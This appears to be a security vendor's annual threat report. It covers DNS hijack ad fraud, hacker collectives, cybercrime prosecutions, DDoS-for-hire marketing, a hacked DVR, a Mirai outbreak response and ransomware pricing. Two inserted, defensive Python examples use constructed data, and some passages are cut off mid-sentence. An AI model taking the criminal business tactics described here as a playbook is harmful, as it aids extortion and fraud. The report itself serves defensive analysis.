Looking through the data in our back end systems, about 98% of our customer base use their own ISP's DNS servers. Of the remaining 2%, half are using known public DNS servers (such as Google DNS), and the other half use unofficial open DNS servers.

Many of the open DNS servers used by that last 1% are, according to our analysis, legitimate open DNS servers. We estimate that only 10% - 20% of those users are, in fact, pointed at rogue DNS servers. This leaves us with an estimate that roughly 0.1% - 0.2% of our customer base are affected by DNS hijack attacks. Of these, the vast majority come from Windows malware/PUA campaigns, and not from router hijacks.
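As an added example that is not part of the report, the following script applies the picture above to a single host: it sorts the resolvers found in a resolv.conf file into the three buckets the report counts (the ISP's own servers, known public servers, anything else), and it flags domains whose answer from the configured resolver disagrees with a trusted resolver, which is what a redirection to a trojanized banking site looks like at the DNS level. The ISP address range, the resolv.conf contents and the DNS answers are constructed sample data; 8.8.8.8 and 8.8.4.4 are Google's real public resolver addresses.

```python
"""Check a host's DNS resolver settings for signs of a DNS hijack.

Added example, not code from the F-Secure report. Two checks are made:
(1) which of the report's buckets each configured resolver falls into
    (ISP, known public, unknown), and
(2) whether answers from the configured resolver agree with a trusted one
    for the kind of sites an attacker would want to impersonate.
All networks, resolv.conf contents and answers are constructed sample data;
ISP_RESOLVER_NETS stands in for the resolver ranges your ISP actually uses.
"""
import ipaddress

# Constructed: resolver ranges belonging to the user's ISP.
ISP_RESOLVER_NETS = [ipaddress.ip_network("203.0.113.0/24")]
# Well-known public resolvers (Google DNS, which the report names as legitimate).
KNOWN_PUBLIC = {"8.8.8.8", "8.8.4.4"}

# Constructed /etc/resolv.conf from a host whose settings have been changed.
SAMPLE_RESOLV_CONF = """\
# Generated by NetworkManager
search example.test
nameserver 198.51.100.7
nameserver 8.8.8.8
"""

# Constructed answers as collected from each resolver: domain -> set of A records.
# The unknown resolver points the bank at an address the trusted resolver never returns.
CONFIGURED_ANSWERS = {
    "bank.example.test": {"192.0.2.66"},
    "social.example.test": {"192.0.2.20", "192.0.2.21"},
}
TRUSTED_ANSWERS = {
    "bank.example.test": {"192.0.2.10", "192.0.2.11"},
    "social.example.test": {"192.0.2.21"},
}


def parse_nameservers(resolv_conf):
    """Return the nameserver addresses listed in resolv.conf text, in order."""
    servers = []
    for line in resolv_conf.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers


def classify_resolver(addr, isp_nets=ISP_RESOLVER_NETS, public=KNOWN_PUBLIC):
    """Classify one resolver as 'isp', 'public' or 'unknown' (the report's three buckets)."""
    ip = ipaddress.ip_address(addr)
    if any(ip in net for net in isp_nets):
        return "isp"
    if addr in public:
        return "public"
    return "unknown"


def divergent_answers(configured, trusted):
    """Domains whose configured-resolver answers share no address with the trusted answers.

    Sharing at least one address is treated as normal, because CDNs legitimately
    hand out different subsets of their address pool to different resolvers.
    """
    return sorted(
        d for d in trusted if d in configured and not (configured[d] & trusted[d])
    )


def check_host(resolv_conf, configured_answers, trusted_answers):
    """Combine resolver classification and answer comparison into one report dict."""
    servers = parse_nameservers(resolv_conf)
    return {
        "resolvers": {s: classify_resolver(s) for s in servers},
        "unknown_resolvers": [s for s in servers if classify_resolver(s) == "unknown"],
        "divergent": divergent_answers(configured_answers, trusted_answers),
    }


if __name__ == "__main__":
    report = check_host(SAMPLE_RESOLV_CONF, CONFIGURED_ANSWERS, TRUSTED_ANSWERS)
    for server, kind in report["resolvers"].items():
        print(f"nameserver {server}: {kind}")
    print("divergent answers:", report["divergent"])
```

An unknown resolver on its own is not proof of a hijack (the report notes most open resolvers are legitimate); it is the combination with divergent answers for sensitive domains that warrants a closer look at the host and the router.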
Smart Business With DNS Hijacking

[Figure: a compromised DNS service; labels: Legit DNS service, Rogue DNS, Rogue ads, Data]

Campaigns from DNSUnlocker and Looksafe make up the largest market share of the hijacks we're seeing.

guys behind DNS hijacking likely know this and use it to their advantage.

appear in the victim's browser. The attacker then gets paid when those ads show up on pages the victim is browsing.

It makes sense if you think about it. If a victim of DNS hijacking had money stolen from their bank account, or their social media account started sending malware to their connections, they'd know about it pretty quickly and get the situation fixed. The time that the attacker invested in compromising their device would have yielded a possible short-term payout, but now there's one less device providing a stream of revenue. In contrast, ad hijacking provides a steady cash flow for the criminal, and since victims rarely notice what's happening, they continue to get paid and stay off the radar.

At the end of the day, the criminals involved in DNS hijacking appear to be smart enough to favor a steady, silent income over making a quick buck.
The Romanian Underground

OVER THE PAST FEW YEARS, you've probably heard phrases such as "the tactics, techniques, and procedures crafted by highly resourced threat actors are falling into the hands of less skilled adversaries." That's long speak for "expect a lot more script kiddies to start pwning your systems." As Dr. Ian Levy from GCHQ recently pointed out, a lot of the attacks we're seeing nowadays aren't Advanced Persistent Threats, they're simple hacks performed by Adequate Pernicious Toerags.

Nothing illustrates this phenomenon better than the group we've dubbed The Romanian Underground. This is a group that our Cyber Security Services colleagues have had first-hand experience with on a number of occasions while performing incident response and forensics work.

The Romanian Underground are, simply put, a bunch of IRC chatroom buddies who decided it would be cool to take up the hobby of hacking. Most of these kids, upon joining the collective, have little to no Unix skills to speak of. They probably know about five commands in total. Newcomers are taken under the wing of a mentor who provides them with simple tools and training to get them started on their new hobby. These mentors are almost as unskilled as the newcomers - they probably know about five more Unix commands than their apprentices. But they've been in the game for a few weeks already, and have a wealth of experience.

As newcomers learn the ropes (which usually implies that they've learned to configure the tools they've been provided), they're promoted to mentors, and take on their own set of apprentices. This hierarchical model closely resembles the popular pyramid selling schemes you might have had the misfortune to come across. Of course, the guys involved in The Romanian Underground aren't looking to become millionaires by selling soap - the pyramid scheme is a form of gamification,

[Image caption: This is not the Romanian underground you're looking for.]
Cyber-Sleuthing

A new lead

A short while later, our attacker initiated a similar ransom operation in a neighboring Nordic country. As it turns out, the CEO of the second organization happened to be good friends with the CEO of the company that was hit with the first attack. Upon discussing the attack, they noticed patterns in how the threat actor was operating, and brought our CSS consultants in to help.

CSS staff correlated forensic data from both attacks and quickly arrived at the conclusion that they were indeed being carried out by the same threat actor. They informed the second victim's company of their findings from the previous investigation, including the identity of the criminal. They also informed the second victim that the investigation had led to a dead end. However, it turns out that the second organization was rather well connected with international law enforcement, and shortly after, the perpetrator in question showed up on the FBI's cyber most wanted list.

Nation state or not?

In spite of the timing, the fact that our suspect had shown up on an FBI list shortly after revealing his identity to victim number two might have just been a coincidence. The criminal in question faces a long list of charges, many of which are tied to the Syrian Electronic Army (SEA). Looking at the charges he's facing, it's obvious that the investigations our team were involved in were most likely only tied to the perpetrator's extra-curricular activities. As mentioned earlier, European criminal cases against this attacker were dropped as soon as his location was determined, giving credence to the idea that the threat actor felt he had impunity, being outside of the jurisdiction of European law enforcement.

It's obvious that our guy is on the FBI's most wanted list because of his alleged participation in SEA, given that members of the organization are considered state actors. But it hasn't been proven that the SEA are on the Syrian government's payroll, or that they're taking orders from the Syrian government. What is known is that some of the actions they're performing appear to forward the goals of the government. So, what are the real motives of the SEA members?

There are a few possibilities. Members may have been coerced (threatened, a family member thrown in jail, etc.), they may be idealists who are working for the cause, they may be mercenaries or lone gunmen looking for financial gain, or they might be working toward a get out of jail free card. As far-fetched as the idea seems, we've actually witnessed the get out of jail free card in action. Yevgeniy Bogachev, another guy on the FBI's cyber most wanted list, was allegedly busted by the Russian authorities a few years back for being the mastermind behind GameOver ZeuS. But if he was arrested, he didn't stay detained for too long, possibly due to what many suspect is his botnet's connection with spying operations in Georgia.

You can't hide

At the end of the day, there really is no anonymity on the Internet. Independent threat actors out there need to understand that investigators have access to a surprising amount of metadata. Authorities are experienced enough to know what data to correlate in order to paint a picture of attackers. IP addresses used in attacks, the language and email addresses used in phishing campaigns and other correspondence, social engineering tactics, TTPs used for persistence and lateral movement, or even time correlations between outbound connections from an ISP and subsequent outgoing connections from a VPN exit node are used to paint this picture. As careful as attackers might be, it's going to be almost impossible to prevent authorities from putting the puzzle together. And from there, it doesn't take all that long for the authorities to discover their suspects' real identities.

Our advice to anyone thinking about getting involved in the same sort of stuff as our perpetrator? Don't bother. As good as you think you are at hiding your tracks, the Internet simply doesn't work that way.
The Consequences of Cybercrime

AT TIMES, cyber security seems all doom and gloom. Criminals wreak havoc while hidden services, anonymous handles, and other obfuscation techniques conceal them from discovery.

But sooner or later even the most cunning criminal will commit a fatal flaw that opens a crack through which law enforcement can follow their scent and track them down. Here's a rundown of many of the past year's successes in which criminals have had to face the consequences of their actions.

January

A Manhattan judge sentenced a Latvian man, Deniss Calovskis, to 21 months time already served for his role in the Gozi virus, which infected around 40,000 US computers. Calovskis reportedly wrote a section of the code and profited to the tune of $1000 for his part in the scheme.

Hacker Onur Kopcak was sentenced to a record 334 years in prison for identity theft and bank fraud in Turkey. He operated a phishing website that impersonated a bank site.

February

A UK teenager and member of the hacker group Crackas with Attitude was arrested for his role in hacking the emails of senior US government officials such as CIA director John Brennan and Director of US National Intelligence James Clapper. The group is also accused of, among other crimes, doxing thousands of employees at the FBI and Department of Homeland Security. Two more group members, Americans Justin Gray Liverman and Andrew Otto Boggs, were arrested in September.

April

Hackers behind SpyEye, a prominent banking Trojan in 2010-2012, were sentenced by a US court for developing and distributing the malware. Algerian Hamza Bendelladj was sentenced to 15 years, while his partner, Russian Aleksandr Andreevich Panin, received nine and a half years. The malware infected 50 million computers globally, costing its victims a combined one billion dollars.

The creator of the Blackhole exploit kit, Dmitry Fedotov, otherwise known as Paunch, was sentenced to seven years in a Russian penal colony. A highly popular crimeware service for years until Paunch's 2013 arrest, Blackhole was responsible for a large percentage of malware infections. Six of Paunch's co-conspirators were also sentenced to terms ranging from five to eight years.

May

Ukrainian hacker Vadym Iermolovych pled guilty to his role in an international insider trading scheme in which newswire services were hacked and yet-to-be-published financial press releases were stolen. The scheme generated $30 million, and the hackers were paid a cut of the profits.

June

Russian authorities arrested 50 people connected to a hacker group that siphoned around 25 million dollars from accounts of Russian financial institutions over the past five years using malware called Lurk.
Cyber Crime Marketing 101

HACKERS offer cyber crime as a service as a way of commodifying their skills so they can be bought and sold. But many hackers don't set out to become career cyber criminals. Most start by developing a healthy interest in computer networks, coding, and other technical subjects. Often these interests steer people into developing computer software, websites, or similar career paths. However, there are alternatives to these traditional forms of employment, including providing hacking services to people for money.

These services rarely appear spontaneously. They usually grow out of other interests. For example, a recent exposé on the suspected coder behind Mirai traces his development from a bright programmer, to an entrepreneur running Minecraft servers and then DDoS mitigation services, to programming and operating a botnet behind some of the largest DDoS attacks in history.

This example shows how hacking can develop from a casual interest to a means of earning extra income. And from there, they can become full-blown business ventures that generate healthy revenues comparable to other successful businesses. And a collection of successful businesses adds up to more than the sum of its parts: it becomes an industry.

DDoS

Booter/stresser services exemplify how cyber crime has become an industry. These services allow anyone to rent online tools to launch DDoS attacks. DDoS attacks were responsible for some of the most notable cyber incidents of 2016. Mirai-based botnets were particularly problematic last year, and responsible for the largest DDoS attacks in history. Hackers are now adapting Mirai's source code, which was leaked online, for use in their own botnets. Reports suggest that at least one of these botnets is now available for rent at a rate of about three to four thousand dollars for two weeks. And it's not just DDoS attacks that are being bought and sold online. Exploit kit servers used to attack software vulnerabilities can be rented for as little as 500 dollars a month. Combining an exploit kit with other resources, such as ransomware and botnets that conduct spam campaigns (both of which can be purchased), can turn a technically inept hacker into a financially successful cyber criminal.

Online marketplaces where these cyber crime commodities are advertised, shared, bought, and sold exist, making various tactics, techniques, and procedures accessible to a wide range of threat actors. The word e-commerce invokes thoughts of companies like Amazon, Alibaba, and eBay for many Internet users. But there are more specialized forms of e-commerce that cater to criminals. And not just on the Darknet lurking below the Internet that average users are familiar with. There are online forums accessible to everyone where cyber crime commodities are discussed openly and freely by masquerading as legitimate services.

The DDoS industry is a perfect example of this. These DDoS services are able to advertise themselves in very traditional ways by claiming to be stress testing resources for information security specialists and website administrators. Skirting this grey area is common for cyber crimes, where legal authorities often struggle with limitations in process and jurisdiction. Hackforums.net's server stress testing section, which security experts say was one of the most popular sources to advertise DDoS for hire services, was recently shut down by the site's owner over heightened scrutiny after the Mirai attacks mentioned above. These services are also able to use various social media websites such as Twitter to spread their message. Advertising strategies like these, as well as the use of Bitcoin to conduct financial
transactions, make cyber crime resources accessible for both experienced and amateur cyber criminals.

A textbook example: Lizard Squad

Marketing, advertising, and publicity are now important tactics for successful career cyber criminals to understand in order to draw attention to their wares. And as mentioned above, these models can include the use of social media marketing and word of mouth. However, some groups have taken this a step further, and actually conducted cyber attacks motivated primarily by the need to advertise their services through the mass media.

Lizard Squad's 2014 attacks on Sony and Microsoft over Christmas are a textbook case of this strategy. Lizard Squad's DDoS attacks crippled Sony's PlayStation Network and Microsoft's Xbox Live service for approximately 24 hours on December 25th, with some users still reporting problems several days later. Reports suggested that as many as 150 million people were unable to use their Xbox or PlayStation game consoles as a result of the attack. Tweets sent from Lizard Squad's Twitter account following a different incident in early December verified that their attacks were timed to coincide with the holidays to maximize their awareness raising efforts.

The campaign generated significant amounts of publicity for the group. They drew attention from not only the companies and their customers, but also the general public. According to Google Trends, searches for Lizard Squad increased exponentially in December 2014, and then rapidly declined through January 2015. In a video interview following the event, a Lizard Squad member claimed that the events were intended to raise awareness regarding the low state of computer security at these companies.

Whether the group successfully raised awareness of the security problems facing these companies is an open question. But regardless of their intent, the group quickly moved to capitalize on their newfound fame by introducing their Lizard Stresser attack tool as a service for hire. The tool, made available less than a week after the attacks, allowed customers to rent the group's botnet to use for their own DDoS attacks. The attacks on Microsoft and Sony provided Lizard Squad with impressive references to qualify the efficacy of their tool, which any good marketer will recognize as a valuable tactic to set themselves apart from potential competitors.

None of this was new to the cyber security community, and the pieces were quickly put together by journalists and researchers that follow the threat landscape.

It's not just cyber crime

While cyber criminals form a significant part of these industries, they're hardly alone. Hacktivists have a long history of using DDoS attacks to intimidate targets and draw attention toward whatever cause they're out to support. The US intelligence community has accused advanced persistent threat (APT) groups in Russia of working to influence last year's US presidential election by stealing information from the Democratic National Committee and then leaking that information to the public. Building awareness from these acts through the mass media was key to achieving the attackers' objectives, just like the Lizard Squad example above. And generally speaking, all hackers understand that companies are especially concerned about how these headlines could affect their bottom lines, making it another pressure point for hackers to exploit in their attempts to extort money.

Marketing. PR. Community outreach. However you choose to name the trend, it signifies the industrial logic that's become pervasive amongst hackers. Everyone understands that it's become a good business to be in. Everyone except for organizations that feel they, for whatever reason, won't become a target.
Trolling, cyber bullying, and general f*ckery.

Between 2008 and 2012, organized protest groups associated with anon and 4chan ran fairly high-profile ops. The most famous of these that comes to mind was a protest against the Church of Scientology. Since then, things have changed. Some members of these groups were arrested or turned by law enforcement. Others moved on to start supporting the Arab Spring and other Middle-Eastern causes. Basically, we saw an end to the high-profile organized ops that previously defined these groups. And much of the doxing we've seen since then has consisted of recycled material obtained during their heyday.

But the spirit of what these organizations stood for still lives on in many of their former members, some of whom continue to run as lone wolves. And it seems like they've carried their grudges along with them.

During 2016, our Cyber Security Services consultants investigated a number of trolling cases. Victims of these cases were mostly high-profile business people who were alerted to the fact that a third party had set up one or more social media accounts in their name. In a case of somewhat-stolen-identity, these attacks were designed to damage the victim's reputation. Looking at the targets and motivation behind these attacks (which ranged from fun to revenge), it's possible that some were carried out by the lone wolves we mentioned earlier. One might even speculate that these mini ops could be part of an attempt to get the band back together.

Of course, cyber bullying and trolling take many shapes and forms. The cases that our consultants investigated were very targeted. But generally speaking, there's a lot of random nastiness on the Internet that can take the form of discussion forum trolling, Twitter trolling, nasty comments on YouTube, and in some cases, pictures or video being lifted from Instagram/Snapchat/Periscope and posted on discussion boards and adult sites. As obnoxious behavior and 4chan culture becomes the New Internet Normal, it's little wonder that kids are turning to other crap such as botting and cheating in video games, and DDoSes against Minecraft servers (which happen to bring down major Internet infrastructure, such as Dyn, as collateral damage).

IS MIRAI THE FUTURE OF THE IOT?

THE INSECURE HOME SECURITY SYSTEM (page 36)
After years of warnings from security experts, the inherent insecurity of IoT devices was exploited in mass fashion when large swaths of the Internet were brought down in October's DDoS assault on US service provider Dyn. A recent investigation of a DVR camera by F-Secure Cyber Security Services illustrates why even high-end IoT products may not offer the device security purchasers may expect.

GUEST ARTICLE - FICORA: RESPONDING TO A MIRAI OUTBREAK IN FINLAND (page 38)
Finland was not spared from the 2016 Mirai epidemic, and we've confirmed approximately sixteen thousand compromised devices in the country. What follows is an account of how we at the National Cyber Security Center of Finland (NCSC-FI) responded to the situation.
The Insecure Home Security System

AFTER YEARS of warnings from security experts, the inherent insecurity of IoT devices was exploited in a mass fashion in a series of DDoS attacks during the fall of 2016. In the largest of these attacks, legions of malware-infected IoT devices were employed, bringing down Twitter, Spotify, and a host of other services depending on Dyn. During the previous month, a similar assault was made on security journalist Brian Krebs' site.

Until the autumn attacks, and with some exceptions, IoT exploitation scenarios have been more discussion fodder than reality. Would a hacker take control of your thermostat and demand a ransom payment to turn down the sweltering heat? Could your fridge be used as an entry point to invade your home network? What's more attractive to miscreants: the device itself, or the server behind it where the data is stored?

The recent DDoS events will surely add resolve to the European Commission's proposal to enact a product labeling system for IoT devices that are deemed secure. The idea is to make not only buyers mindful of security, but more importantly manufacturers, who are dismally lacking incentives to make their devices secure. Whether product labeling accomplishes this goal, however, remains to be seen.

[Figure: Hacker finds a vulnerability (BUG); hacker starts scanning the Internet for vulnerable devices using some sort of search engine (e.g. Shodan); as a result, the hacker gets a list of vulnerable devices on the Internet; hacker sells this target list on an underground forum (SELL); someone buys the list and categorizes "interesting" targets into buckets; the person then sells each and every bucket of targets to various parties, and high-value targets go to the highest bidder. This sequence of events is standard practice in some countries where hackers can get real world perks by providing useful information or access.]

Unfortunately, as exemplified by the recent case of a compromised digital video recorder (DVR) investigated by F-Secure Cyber Security Services, this incentive deficit is not limited to the makers of cheapo devices.

The case of the haunted DVR

The head of a venture capital investment firm had installed a high-end DVR (retailing at around $1000), as part of a multi-camera security system for homes and small offices. He integrated it with the rest of his security system according to the manual's instructions
The Insecure Home Security System

and protected the device with a proper password. One of his security cameras pointed toward his workspace and computer monitor.

Two events alerted the exec to the possibility that his DVR had been compromised. For one thing, the box's lights were actively blinking at times when it should have been quiet. And secondly, when he would try to invest in certain firms he was consistently getting outbid. He began to wonder if someone was getting an inside peek at his bids by viewing his computer monitor via the security cam footage.

Our CSS team's investigation revealed that his suspicions were correct: the device had indeed been compromised. A vulnerability in the box had allowed a hacker to change the password remotely over the Internet, without knowing the existing password, and to download stored content from the device. Our investigation led us to Russian language forums where this particular vulnerability was being discussed.

Who hacked the DVR box, and why? We can't say for certain; attribution is both difficult and dangerous. We also don't know if the suspicious outbidding was a mere coincidence.

We reached out to the maker of the DVR box. When provided with details of this vulnerability, they were uninterested in taking steps to correct it. The particular model is no longer on the market, and a newer model exists but that's not to say the newer model doesn't also have the same flaw.

Money can't buy everything

The case illustrates that in today's market dynamic, sadly, paying more doesn't mean a product is more secure it only means it has more features. While purchasers of high-end IoT products may consider themselves secure, such an expectation is only a myth. Until connected things adequately address the security challenges they face, users would do well to consider the tradeoffs of their devices being online. In the case of a DVR, Internet connectivity allows the user to view their premises remotely, through an app but it also opens up the risk of the device getting owned and working at the behest of an attacker.
GUEST ARTICLE
Responding to a Mirai Outbreak in Finland

2016 saw the birth of Mirai-based botnets. Mirai, a piece of code, exhibited incredible capabilities that grabbed the attention of the cyber security community. Reports suggest that millions of devices across the world were compromised during the latter half of the year. Finland was not spared from the epidemic, and we've confirmed approximately sixteen thousand compromised devices in the country. What follows is an account of how we at the National Cyber Security Center of Finland (NCSC-FI) responded to the situation.

Start of incident response

Monday, the 28th of November was supposed to be a normal working day at NCSC-FI. But the first thing that caught our eyes in the situation center was an Autoreporter graph that exhibited an enormous peak of different malware detections on Sunday, November 27th. Autoreporter is the NCSC-FI service that automatically collects malware and information security incident observations concerning Finnish networks.

The peak was definitely something we would have to investigate, but we were unsure where to start. Was the peak caused by some glitch or feature in our data normalization routines? Had some of our data sources gone berserk? Or was there really a massive malware distribution campaign happening in Finland?

We were aware of various blog postings published over the weekend that analyzed the infection mechanism of the Mirai malware. And we knew that the latest Mirai variant scans for open services on TCP port 7547. Our first suspicions led us to believe that one of the sources feeding information to Autoreporter was rather sloppy in giving infection verdicts. We performed a few queries with raw Autoreporter data, which confirmed that the majority of detections on Sunday did in fact have traffic to TCP port 7547.

We also checked our own sensor data and saw that TCP 7547 scanning started on November 25 at 13:30 UTC. To say that the scanning traffic's growth was very aggressive would be an understatement. Prior to this spike, Mirai had only infected a few hundred devices in Finland. That number had suddenly grown to around 16,000.

An action plan

We now had a firm belief that we were looking at a rather massive Mirai botnet expansion in Finland. We started contacting the biggest Finnish ISPs and creating an action plan. The ISPs had made similar observations on their own, and there was a general
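The two checks the account above describes, reconciling a feed's "infected" verdicts against sensor traffic to TCP 7547 and then dating the onset and hour-over-hour growth of the scanning, as an added example. This is not NCSC-FI's or Autoreporter's code; the flow and verdict record formats, the addresses and the timestamps are all constructed for the example.

```python
"""Added example, not NCSC-FI or Autoreporter code: check a feed's "infected"
verdicts against sensor flows to TCP 7547, then date the onset of the
scanning and its hour-over-hour growth. All records below are constructed."""
from collections import defaultdict
from datetime import datetime, timezone

MIRAI_PORT = 7547  # TCP port scanned by the late-2016 Mirai variant

# Constructed sensor flows "timestamp,src_ip,dst_ip,dst_port,proto"
# (RFC 5737 documentation addresses; the one UDP line must be ignored).
SAMPLE_FLOWS = """\
2016-11-25T12:05:00Z,192.0.2.10,203.0.113.5,443,tcp
2016-11-25T13:30:00Z,192.0.2.12,203.0.113.5,7547,tcp
2016-11-25T13:45:00Z,192.0.2.13,203.0.113.6,7547,tcp
2016-11-25T14:02:00Z,192.0.2.12,203.0.113.7,7547,tcp
2016-11-25T14:10:00Z,192.0.2.14,203.0.113.5,7547,tcp
2016-11-25T14:20:00Z,192.0.2.15,203.0.113.5,7547,tcp
2016-11-25T14:31:00Z,192.0.2.16,203.0.113.5,7547,tcp
2016-11-25T15:01:00Z,192.0.2.17,203.0.113.5,7547,tcp
2016-11-25T15:03:00Z,192.0.2.18,203.0.113.5,7547,tcp
2016-11-25T15:05:00Z,192.0.2.19,203.0.113.5,7547,tcp
2016-11-25T15:09:00Z,192.0.2.20,203.0.113.5,7547,tcp
2016-11-25T15:15:00Z,192.0.2.21,203.0.113.5,7547,udp
2016-11-25T15:20:00Z,192.0.2.22,203.0.113.5,7547,tcp
2016-11-25T15:40:00Z,192.0.2.23,203.0.113.5,7547,tcp
2016-11-25T15:50:00Z,192.0.2.24,203.0.113.5,7547,tcp
2016-11-25T15:55:00Z,192.0.2.25,203.0.113.5,7547,tcp
"""

# Constructed upstream verdicts "src_ip,verdict,feed".
SAMPLE_VERDICTS = """\
192.0.2.12,infected,feed-a
192.0.2.13,infected,feed-a
192.0.2.11,infected,feed-b
192.0.2.16,infected,feed-a
192.0.2.10,clean,feed-b
"""


def parse_flows(text):
    """Parse flow lines into dicts carrying an aware UTC timestamp."""
    flows = []
    for line in filter(None, map(str.strip, text.splitlines())):
        ts, src, dst, port, proto = line.split(",")
        stamp = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        flows.append({"ts": stamp, "src": src, "dst": dst, "port": int(port), "proto": proto})
    return flows


def port_flows(flows, port=MIRAI_PORT, proto="tcp"):
    """Flows that are connection attempts to the port over the given protocol."""
    return [f for f in flows if f["port"] == port and f["proto"] == proto]


def corroborate_verdicts(verdict_text, flows, port=MIRAI_PORT):
    """Return (backed, total, {feed: [unbacked ips]}) for 'infected' verdicts.
    A feed whose verdicts are mostly unbacked is the sloppy source to chase."""
    seen = {f["src"] for f in port_flows(flows, port)}
    backed = total = 0
    unbacked = defaultdict(list)
    for line in filter(None, map(str.strip, verdict_text.splitlines())):
        ip, verdict, feed = line.split(",")
        if verdict != "infected":
            continue
        total += 1
        if ip in seen:
            backed += 1
        else:
            unbacked[feed].append(ip)
    return backed, total, dict(unbacked)


def scan_onset(flows, port=MIRAI_PORT):
    """Earliest TCP connection attempt to the port, or None if there was none."""
    hits = port_flows(flows, port)
    return min(f["ts"] for f in hits) if hits else None


def sources_per_hour(flows, port=MIRAI_PORT):
    """Distinct scanning sources per UTC hour as [(hour, count)] in time order."""
    buckets = defaultdict(set)
    for f in port_flows(flows, port):
        buckets[f["ts"].replace(minute=0, second=0)].add(f["src"])
    return [(hour, len(srcs)) for hour, srcs in sorted(buckets.items())]


def growth_factors(per_hour):
    """Hour-over-hour multipliers of the distinct-source count."""
    counts = [n for _, n in per_hour]
    return [round(b / a, 2) for a, b in zip(counts, counts[1:]) if a]


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    print("verdicts backed by port traffic:", corroborate_verdicts(SAMPLE_VERDICTS, flows))
    print("scan onset:", scan_onset(flows))
    hourly = sources_per_hour(flows)
    for hour, n in hourly:
        print(f"{hour:%Y-%m-%d %H:%M} UTC  distinct sources: {n}")
    print("hour-over-hour growth:", growth_factors(hourly))
```

On the constructed data the onset is 13:30 UTC, one feed's verdict has no backing traffic, and the scanning source count doubles each hour.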
THE YEAR IN RANSOMWARE

THE RANSOMWARE TUBE MAP 41
THE BITCOIN DILEMMA 42
CRIME WITH A CUSTOMER MINDSET 43
BITCOIN FRICTION IS RANSOMWARE'S ONLY CONSTRAINT 45
WHAT WE ARE DOING RIGHT (GUEST ARTICLE, VIRUS BULLETIN) 47

[Figure: The Ransomware Tube Map, a timeline of ransomware families by month of first sighting from 2012 to 2017; the family names are not recoverable from the extracted text.]
The Bitcoin Dilemma

RANSOMWARE pricing is like a game of The Price is Right. The criminals want to ask as much as they can, but if they set their sights too high, the fish swim away. At least, when it comes to consumers. When it comes to businesses, loss of access to business-critical data and systems makes it harder to walk away. A recent study by IBM found that while over 50% of consumers said they would not pay a ransom to get their encrypted files back, 70% of businesses that had experienced an infection had paid up.

The price a victim pays for a ransom depends on whether the payment is requested in Bitcoin or a real-world currency such as dollars.

Take the example of a one-Bitcoin ransom. In 2016 that could have meant anywhere from $357 at its lowest in January, to a high of $993 at year's end. Bitcoin prices can fluctuate as much as $100 in a couple of days, meaning that waiting to pay a ransom could mean quite a difference from the price at the time of infection. For this reason, ransomware families sometimes adjust their Bitcoin asking price to keep it in a general range. One day the price may be 1 Bitcoin, the next, after a jump in Bitcoin value, .85 Bitcoin.

On the surface, ransom fees that are stated in dollars would seem to be more stable for the victim. $500 worth of Bitcoin is still $500, whether a Bitcoin is worth $100 or $800. But it's not always so straightforward. If an attacker states a demand of $500 worth of Bitcoin, and the Bitcoin price suddenly jumps, by the time the victim figures out how to make the payment, $500 won't buy as much Bitcoin as before and the attacker may request more.

Some reports show that the average ransom demand has increased. According to a Symantec study, the average demand in late 2015 was $295, rising to $679 in July of last year. The trend can be attributed in part to the rise in Bitcoin value. One ransomware criminal F-Secure communicated with in our 2016 ransomware study dropped his asking price to .4 Bitcoin on June 17, when the price of a Bitcoin was about $750 (that's $300). On January 26 of 2017, we communicated with him again and his final offer was still .4 Bitcoin, when the price was hovering around $915 (that's about $366).

According to F-Secure's own unofficial Twitter poll last spring, ransomware criminals might do well to keep their rates on the lower side. While only 8% of respondents said they'd be willing to pay a fee of more than $400 to recover lost data, 29% were willing to shell out an amount under $400.
Crime with a Customer Mindset

2016 WAS, by many accounts, the year of ransomware. In late 2015, F-Secure experts predicted that the growing number of ransomware threats they'd seen in our telemetry would continue to increase. 2016 did not disappoint.

Ransomware made its first major appearance of the year when it crippled the systems of the Hollywood Presbyterian Medical Center in February 2016. From then on, ransomware's antics played out in the headlines with a steady stream of stories about businesses, medical centers, and even law enforcement agencies being hit.

Ransomware is a trend with staying power thanks to it finding a business model that works. The promise of unlocking encrypted files is a clear benefit, and too often it's the cheapest, most efficient option for affected organizations.

A successful business model isn't the only concept that ransomware has borrowed from traditional business. Its perpetrators have also seized on the idea of the customer journey. Journalist Brian Krebs noted that the more successful strains of ransomware would be the ones that know how to offer good customer service to their victims.

To that end, ransomware families have evolved to offer customer-friendly features to guide their victims in making the Bitcoin payment. Personal webpages in several languages. Helpful FAQs. Free trial decryption for one file. And support channels where customers can get in touch with the crooks.

How good is ransomware customer service? To find out, we reached out to the criminals behind five active families via their support channels. A non-technical employee played the part of a naive victim. Her experience varied depending on the family, but there were some definite consistencies.

Ransoms can be negotiated.

We found that ransomware criminals are usually willing to negotiate on the price. Three out of four variants we made contact

FAMILY      STARTING DEMAND   LOWEST DEMAND   %DISCOUNT
CERBER      530               530             0%
CRYPTOMIX   1900              635             67%
JIGSAW      150               125             17%
SHADE       400               280             30%
AVERAGE                                       29%
Bitcoin Friction is Ransomware's Only Constraint

IN JANUARY 2017, I began tracking the customer portal of an innovative new family of crypto-ransomware called Spora. Among its innovations are a dedicated domain (spora.biz, spora.bz, et cetera) running a Tor web proxy, HTTPS support, an initially lower extortion demand, and tiered pricing with options to unencrypt individual files (up to 25Mb in size) rather than all.

Also part of the portal: a group chat function for support requests. Multiple conversations are all strung together, making for a fascinating read overall.

Among recent conversations is a bit.ly link to a forum page on the site BleepingComputer.com where the Spora Administrator wanted reviews left, as evidence that paying the extortion results in unencrypted files. The bulk of clicks, according to bit.ly statistics (see the graph on the next page), occur on a Tuesday. FYI: running a cyber extortion scheme is a regularly scheduled job and spam runs go out on Tuesdays.

A great deal of the chat support issues revolve around one thing: Bitcoin.

7: I don't have a bitcoin account yet and can't make it within 3 days, as you know.

Support: We removed all deadlines for you.

Apparently 7 thinks it's not so easy to set up a Bitcoin account as you know.

And here's another practicality that exists for many people in the cash economy:

A: Admin, I don't know what checked the course means. It is hard to purchase bitcoins in the US I drove over 200 miles to purchase 500 worth, they took 10% you take 11% I had USD70 in a different wallet you took 11%, you have USD466 and I have no way to purchase more until tomorrow and will once again have to drive 200 mile to get them and get home. Please consider.

Support: No problem

[Figure: bit.ly click statistics for the Spora review page, Feb 3rd to Feb 12th, 0 to 100 clicks per day.] The bulk of clicks on the review page for Spora ransomware occur on a Tuesday, the same day spam runs go out.

